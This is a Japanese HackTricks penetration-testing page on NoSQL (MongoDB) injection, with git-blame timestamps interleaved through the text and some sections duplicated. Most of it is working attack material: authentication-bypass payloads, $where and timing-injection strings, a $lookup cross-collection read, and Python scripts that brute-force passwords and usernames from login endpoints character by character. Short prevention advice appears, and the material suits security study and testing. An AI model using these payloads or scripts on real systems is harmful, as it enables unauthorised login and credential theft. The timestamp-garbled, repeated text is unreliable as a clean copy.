2023-07-07 23:42:27 +00:00
# NoSQLインジェクション
2022-04-28 16:01:33 +00:00
2024-03-29 21:29:39 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-03-17 16:50:32 +00:00
[**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks )を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
2024-03-29 21:29:39 +00:00
今すぐアクセスしてください:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-03-29 21:29:39 +00:00
< summary > < strong > **htARTE (HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > ! < / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2024-03-29 21:29:39 +00:00
HackTricksをサポートする他の方法:
2023-12-31 05:23:56 +00:00
2024-03-29 21:29:39 +00:00
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& HackTricksスウォッグ** ](https://peass.creator-spring.com )を入手してください
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**をフォロー**してください。
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、**ハッキングトリックを共有**してください。
2022-04-28 16:01:33 +00:00
< / details >
2023-12-31 05:23:56 +00:00
## Exploit
2020-07-15 15:43:14 +00:00
2024-03-29 21:29:39 +00:00
PHPでは、送信されるパラメータを_parameter=foo_から_parameter\[arrName\]=foo_に変更することで、配列を送信できます。
2020-07-15 15:43:14 +00:00
2024-03-29 21:29:39 +00:00
エクスプロイトは、**オペレーター**を追加することに基づいています:
2020-07-15 15:43:14 +00:00
```bash
username[$ne]=1$password[$ne]=1 #< Not Equals >
username[$regex]=^adm$password[$ne]=1 #Check a < regular expression > , could be used to brute-force a parameter
username[$regex]=.{25}& pass[$ne]=1 #Use the < regex > to find the length of a value
2021-04-19 22:42:22 +00:00
username[$eq]=admin& password[$ne]=1 #< Equals >
2020-07-15 15:43:14 +00:00
username[$ne]=admin& pass[$lt]=s #< Less than > , Brute-force pass[$lt] to find more users
username[$ne]=admin& pass[$gt]=s #< Greater Than >
username[$nin][admin]=admin& username[$nin][test]=test& pass[$ne]=7 #< Matches non of the values of the array > (not test and not admin)
{ $where: "this.credits == this.debits" }#< IF > , can be used to execute code
```
2024-02-06 04:13:43 +00:00
### 基本認証バイパス
2020-07-15 15:43:14 +00:00
2024-03-03 09:51:22 +00:00
**等しくない ($ne) やより大きい ($gt) を使用する**
2020-07-15 15:43:14 +00:00
```bash
#in URL
username[$ne]=toto& password[$ne]=toto
2021-06-26 15:50:17 +00:00
username[$regex]=.*& password[$regex]=.*
2020-07-15 15:43:14 +00:00
username[$exists]=true& password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
2023-07-07 23:42:27 +00:00
### **SQL - Mongo**
2024-02-06 04:13:43 +00:00
2024-03-29 21:29:39 +00:00
#### **NoSQL Injection**
NoSQL databases like MongoDB are also vulnerable to injection attacks. In MongoDB, the injection can occur when a query is built using user input without proper sanitization. Attackers can manipulate the query to retrieve unauthorized data or perform malicious operations.
#### **Example**
Consider the following MongoDB query:
```javascript
db.users.find({ username: 'admin' })
```
An attacker can perform a NoSQL injection by manipulating the query as follows:
```javascript
db.users.find({ username: { $gt: '' }, password: { $gt: '' } })
```
This query can retrieve data of all users, not just the 'admin' user, potentially leading to a data breach.
#### **Prevention**
To prevent NoSQL injection, always validate and sanitize user input before using it in database queries. Use parameterized queries or ORM libraries that handle input sanitization automatically.
2024-01-14 22:50:36 +00:00
```javascript
query = { $where: `this.username == '${username}'` }
```
2024-03-29 21:29:39 +00:00
攻撃者は、`admin' || 'a'=='a`のような文字列を入力することで、クエリが真理値(`'a'=='a'`) を満たす条件ですべてのドキュメントを返すように悪用できます。これは、SQLインジェクション攻撃と類似しており、`' or 1=1-- -`のような入力を使用してSQLクエリを操作することができます。MongoDBでは、`' || 1==1//`、`' || 1==1%00`、または`admin' || 'a'=='a`のような入力を使用して同様のインジェクションが行われる可能性があります。
2024-01-15 10:44:51 +00:00
```
2020-07-15 15:43:14 +00:00
Normal sql: ' or 1=1-- -
2024-01-14 22:50:36 +00:00
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
2020-07-15 15:43:14 +00:00
```
2024-02-06 04:13:43 +00:00
### 長さ情報を抽出
2020-07-15 15:43:14 +00:00
```bash
username[$ne]=toto& password[$regex]=.{1}
username[$ne]=toto& password[$regex]=.{3}
# True if the length equals 1,3...
```
2024-03-29 21:29:39 +00:00
### データ情報を抽出
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
in URL (if length == 3)
username[$ne]=toto& password[$regex]=a.{2}
username[$ne]=toto& password[$regex]=b.{2}
...
username[$ne]=toto& password[$regex]=m.{2}
username[$ne]=toto& password[$regex]=md.{1}
username[$ne]=toto& password[$regex]=mdp
username[$ne]=toto& password[$regex]=m.*
username[$ne]=toto& password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
2024-03-03 09:51:22 +00:00
### **SQL - Mongo**
2024-02-06 04:13:43 +00:00
2024-03-17 16:50:32 +00:00
#### **NoSQL Injection**
2024-03-29 21:29:39 +00:00
NoSQL databases like MongoDB are also vulnerable to injection attacks. The injection techniques used in NoSQL databases are different from those used in traditional SQL databases. In NoSQL databases, attackers can exploit vulnerabilities to manipulate the NoSQL queries and retrieve unauthorized data.
2024-03-17 16:50:32 +00:00
#### **NoSQL Injection Payloads**
2024-03-29 21:29:39 +00:00
Below are some example payloads that can be used to perform NoSQL injection attacks:
2024-03-17 16:50:32 +00:00
2024-03-29 21:29:39 +00:00
- **Payload 1**: `{"username": {"$gt": ""}, "password": {"$gt": ""}}`
- **Payload 2**: `{"$ne": {"password": ""}}`
- **Payload 3**: `{"username": "admin", "password": {"$regex": "^a.*"}}`
2024-03-17 16:50:32 +00:00
#### **Preventing NoSQL Injection**
2024-03-29 21:29:39 +00:00
To prevent NoSQL injection attacks, it is important to:
- Sanitize user input
- Use parameterized queries
- Implement proper access controls
- Keep the database and server software up to date
2024-03-17 16:50:32 +00:00
2024-03-29 21:29:39 +00:00
By following these best practices, you can reduce the risk of NoSQL injection vulnerabilities in your application.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/?search=admin' & & this.password%00 --> Check if the field password exists
/?search=admin' & & this.password & & this.password.match(/.*/)%00 --> start matching password
/?search=admin' & & this.password & & this.password.match(/^a.*$/)%00
/?search=admin' & & this.password & & this.password.match(/^b.*$/)%00
/?search=admin' & & this.password & & this.password.match(/^c.*$/)%00
...
/?search=admin' & & this.password & & this.password.match(/^duvj.*$/)%00
...
/?search=admin' & & this.password & & this.password.match(/^duvj78i3u$/)%00 Found
```
2024-03-17 16:50:32 +00:00
### PHP任意関数実行
2020-07-15 15:43:14 +00:00
2024-03-29 21:29:39 +00:00
[MongoLite ](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite )ライブラリの**$func**演算子を使用すると、デフォルトで使用される可能性があり、[このレポート](https://swarm.ptsecurity.com/rce-cockpit-cms/)に記載されているように、任意の関数を実行できるかもしれません。
2021-04-30 09:16:21 +00:00
```python
"user":{"$func": "var_dump"}
```
2024-03-17 16:50:32 +00:00
![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit\_auth\_check\_10.png ](<../.gitbook/assets/image (468 ).png>)
2021-04-30 09:16:21 +00:00
2023-07-07 23:42:27 +00:00
### 異なるコレクションから情報を取得する
2023-03-23 14:03:29 +00:00
2024-03-03 09:51:22 +00:00
異なるコレクションから情報を取得するには、[**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/)を使用することができます。次の例では、**`users`**という**異なるコレクション**から読み取り、ワイルドカードに一致するパスワードを持つ**すべてのエントリの結果**を取得しています。
**注意:** `$lookup` や他の集計関数は、より一般的な`find()`や`findOne()`関数ではなく、検索を実行するために`aggregate()`関数が使用された場合にのみ利用可能です。
2023-03-23 14:03:29 +00:00
```json
[
2023-07-07 23:42:27 +00:00
{
"$lookup":{
"from": "users",
"as":"resultado","pipeline": [
{
"$match":{
"password":{
"$regex":"^.*"
}
}
}
]
}
}
2023-03-23 14:03:29 +00:00
]
```
2024-03-29 21:29:39 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-03-29 21:29:39 +00:00
[**Trickest** ](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks )を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
2024-02-06 04:13:43 +00:00
今すぐアクセスしてください:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2024-02-06 04:13:43 +00:00
## MongoDB ペイロード
[こちらからリスト ](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt )
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' & & this.password.match(/.*/)//+%00
' & & this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it< 5000 ) ;
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
2024-03-29 21:29:39 +00:00
## Blind NoSQLスクリプト
2020-07-15 15:43:14 +00:00
```python
import requests, string
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(21):
2023-07-07 23:42:27 +00:00
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("< TRUE > " in r.text):
flag += char
print("[+] Flag: "+flag)
break
2020-07-15 15:43:14 +00:00
```
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
2023-07-07 23:42:27 +00:00
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
2024-02-06 04:13:43 +00:00
### POSTログインからのユーザー名とパスワードの総当たり攻撃
2020-07-15 15:43:14 +00:00
2024-03-03 09:51:22 +00:00
これは簡単なスクリプトですが、前述のツールでもこのタスクを実行できます。
2020-07-15 15:43:14 +00:00
```python
import requests
import string
url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
2023-07-07 23:42:27 +00:00
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")
2020-07-15 15:43:14 +00:00
2024-01-14 22:50:36 +00:00
def get_usernames(prefix):
2023-07-07 23:42:27 +00:00
usernames = []
2024-01-14 22:50:36 +00:00
params = {"username[$regex]":"", "password[$regex]":".*"}
2023-07-07 23:42:27 +00:00
for c in possible_chars:
2024-01-14 22:50:36 +00:00
username = "^" + prefix + c
2023-07-07 23:42:27 +00:00
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print(username)
2024-01-14 22:50:36 +00:00
for user in get_usernames(prefix + c):
usernames.append(user)
2023-07-07 23:42:27 +00:00
return usernames
2020-07-15 15:43:14 +00:00
2024-01-14 22:50:36 +00:00
for u in get_usernames(""):
2023-07-07 23:42:27 +00:00
get_password(u)
2020-07-15 15:43:14 +00:00
```
2024-02-06 04:13:43 +00:00
## ツール
* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration ](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration )
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite ](https://github.com/C4l1b4n/NoSQL-Attack-Suite )
2023-07-07 23:42:27 +00:00
## 参考文献
2022-04-28 16:01:33 +00:00
2022-08-31 22:35:39 +00:00
* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media ](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media )
2022-09-09 11:00:52 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection )
2024-02-06 04:13:43 +00:00
* [https://nullsweep.com/a-nosql-injection-primer-with-mongo/ ](https://nullsweep.com/a-nosql-injection-primer-with-mongo/ )
* [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb ](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb )
2022-04-28 16:01:33 +00:00
< details >
2024-03-29 21:29:39 +00:00
< summary >< strong > htARTE (HackTricks AWS Red Team Expert)</ strong > で **ゼロからヒーローまでのAWSハッキングを学ぶ** </ summary >
2023-12-31 05:23:56 +00:00
2024-03-29 21:29:39 +00:00
HackTricks をサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-03-29 21:29:39 +00:00
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop ) をチェック!
* [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com ) を手に入れる
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ) を発見し、独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family ) のコレクションを見つける
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f ) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live ) をフォローする
* **HackTricks** と [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
2022-04-28 16:01:33 +00:00
< / details >
2024-03-29 21:29:39 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-03-29 21:29:39 +00:00
[**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks ) を使用して、世界で最も高度なコミュニティツールによって強化された **ワークフローを簡単に構築** および **自動化** します。\
今すぐアクセスを取得:
2022-04-28 16:01:33 +00:00
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}